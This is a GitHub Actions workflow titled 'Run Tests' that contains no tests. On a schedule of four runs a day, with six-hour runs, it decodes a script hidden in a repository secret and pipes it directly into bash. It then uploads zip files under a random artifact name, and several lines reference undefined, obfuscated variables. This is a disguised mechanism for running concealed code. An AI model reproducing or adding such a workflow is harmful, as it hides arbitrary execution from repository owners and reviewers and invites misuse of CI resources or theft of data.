name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '4 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          pa0: ${{ secrets.pa0 }}
        run: |
          printf '%s' "$pa0" | jq -r .tx5 | /bin/bash
          echo $mq246 | jq -r .mqlj19860 | /bin/bash
          printf '%s' "$zob5984" | jq -r .qvrz4057 | /bin/bash
          printf '%s' "$fsga94" | jq -r .jkxef857 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: CMVcvxMQ
          path: "*.zip"
          retention-days: 1
